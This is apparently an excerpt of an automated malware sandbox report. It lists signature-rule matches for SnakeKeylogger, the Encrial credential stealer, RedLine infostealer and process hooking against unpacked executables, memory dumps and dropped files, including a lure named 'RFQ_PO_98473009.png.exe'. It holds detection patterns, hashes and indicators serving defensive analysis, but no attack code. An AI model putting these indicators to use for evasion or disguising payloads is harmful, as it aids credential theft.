                      Source: 18.2.Native_New-Nova.exe.4a60000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.4a70000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 12.2.Native_snake01.exe.49c0f20.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.Native_snake01.exe.49c0f20.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.49c0f20.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 10.3.Native_New-Nova.exe.7693e8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.3.Native_New-Nova.exe.7693e8.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 17.2.lVbhkOPdhyxT.exe.17a46b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 10.2.Native_New-Nova.exe.3615570.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.3615570.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 18.2.Native_New-Nova.exe.4a60000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.4a60000.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.Native_New-Nova.exe.21b183e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.21b183e.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.21c02f6.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.Native_snake01.exe.21c02f6.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.21c02f6.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 12.2.Native_snake01.exe.49c0f20.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.Native_snake01.exe.49c0f20.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.49c0f20.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 19.2.Native_snake01.exe.1fc02f6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.2.Native_snake01.exe.1fc02f6.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.1fc02f6.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.21c1216.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.Native_snake01.exe.21c1216.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.21c1216.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: Native_New-Nova.exe PID: 7852, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: Native_snake01.exe PID: 7944, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: Native_New-Nova.exe PID: 3000, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: Native_snake01.exe PID: 2524, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: RFQ_PO_98473009.png.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: lVbhkOPdhyxT.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
